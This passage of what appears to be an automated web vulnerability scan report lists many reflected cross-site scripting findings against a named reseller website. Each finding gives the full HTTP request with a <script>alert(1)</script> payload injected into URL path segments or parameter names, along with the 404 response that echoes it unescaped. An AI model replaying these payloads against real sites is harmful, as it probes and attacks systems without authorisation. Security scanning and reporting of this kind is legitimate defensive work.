The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cb3cb<script>alert(1)</script>da3acd5b13e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmoscb3cb<script>alert(1)</script>da3acd5b13e/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmoscb3cb<script>alert(1)</script>da3acd5b13e/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1600. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 82e88<script>alert(1)</script>5f04879472 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images82e88<script>alert(1)</script>5f04879472/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images82e88<script>alert(1)</script>5f04879472/rating/ was not found on this server.</p>
...[SNIP]...

2.1601. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 86979<script>alert(1)</script>d24b49446ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating86979<script>alert(1)</script>d24b49446ae/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating86979<script>alert(1)</script>d24b49446ae/ was not found on this server.</p>
...[SNIP]...

2.1602. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57024<script>alert(1)</script>9015b1dc334 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/?57024<script>alert(1)</script>9015b1dc334=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/?57024<script>alert(1)</script>9015b1dc334=1 was not found on this server.</p>
...[SNIP]...

2.1603. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 839b9<script>alert(1)</script>7ec92a08fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail839b9<script>alert(1)</script>7ec92a08fa8/19/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail839b9<script>alert(1)</script>7ec92a08fa8/19/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1604. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cbea6<script>alert(1)</script>02109f221c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19cbea6<script>alert(1)</script>02109f221c9/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19cbea6<script>alert(1)</script>02109f221c9/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1605. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3578d<script>alert(1)</script>37dc2996d11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes3578d<script>alert(1)</script>37dc2996d11/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes3578d<script>alert(1)</script>37dc2996d11/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1606. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c01f7<script>alert(1)</script>488a8c30ff2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmosc01f7<script>alert(1)</script>488a8c30ff2/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmosc01f7<script>alert(1)</script>488a8c30ff2/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1607. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ddb88<script>alert(1)</script>fafcc471c1f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/imagesddb88<script>alert(1)</script>fafcc471c1f/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/imagesddb88<script>alert(1)</script>fafcc471c1f/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1608. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 953e3<script>alert(1)</script>82a4b23cd4b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating953e3<script>alert(1)</script>82a4b23cd4b/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating953e3<script>alert(1)</script>82a4b23cd4b/0.gif was not found on this server.</p>
...[SNIP]...

2.1609. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d7a2c<script>alert(1)</script>980d5cb557f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/0.gifd7a2c<script>alert(1)</script>980d5cb557f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/0.gifd7a2c<script>alert(1)</script>980d5cb557f was not found on this server.</p>
...[SNIP]...

2.1610. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84ca7<script>alert(1)</script>6f755c30ea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/0.gif?84ca7<script>alert(1)</script>6f755c30ea0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/0.gif?84ca7<script>alert(1)</script>6f755c30ea0=1 was not found on this server.</p>
...[SNIP]...

2.1611. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a802<script>alert(1)</script>9c38f5e0718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9a802<script>alert(1)</script>9c38f5e0718/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9a802<script>alert(1)</script>9c38f5e0718/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1612. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload def51<script>alert(1)</script>760a833f071 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19def51<script>alert(1)</script>760a833f071/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19def51<script>alert(1)</script>760a833f071/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1613. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70ffb<script>alert(1)</script>19dc54cc2eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes70ffb<script>alert(1)</script>19dc54cc2eb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes70ffb<script>alert(1)</script>19dc54cc2eb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1614. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e4f7<script>alert(1)</script>bbdc6d22208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos1e4f7<script>alert(1)</script>bbdc6d22208/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos1e4f7<script>alert(1)</script>bbdc6d22208/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1615. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97f96<script>alert(1)</script>2d366d96b5d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images97f96<script>alert(1)</script>2d366d96b5d/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images97f96<script>alert(1)</script>2d366d96b5d/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1616. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 299e7<script>alert(1)</script>8c17a4aa36b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating299e7<script>alert(1)</script>8c17a4aa36b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating299e7<script>alert(1)</script>8c17a4aa36b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1617. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4b22d<script>alert(1)</script>5e6e863dc43 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/search.php4b22d<script>alert(1)</script>5e6e863dc43?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
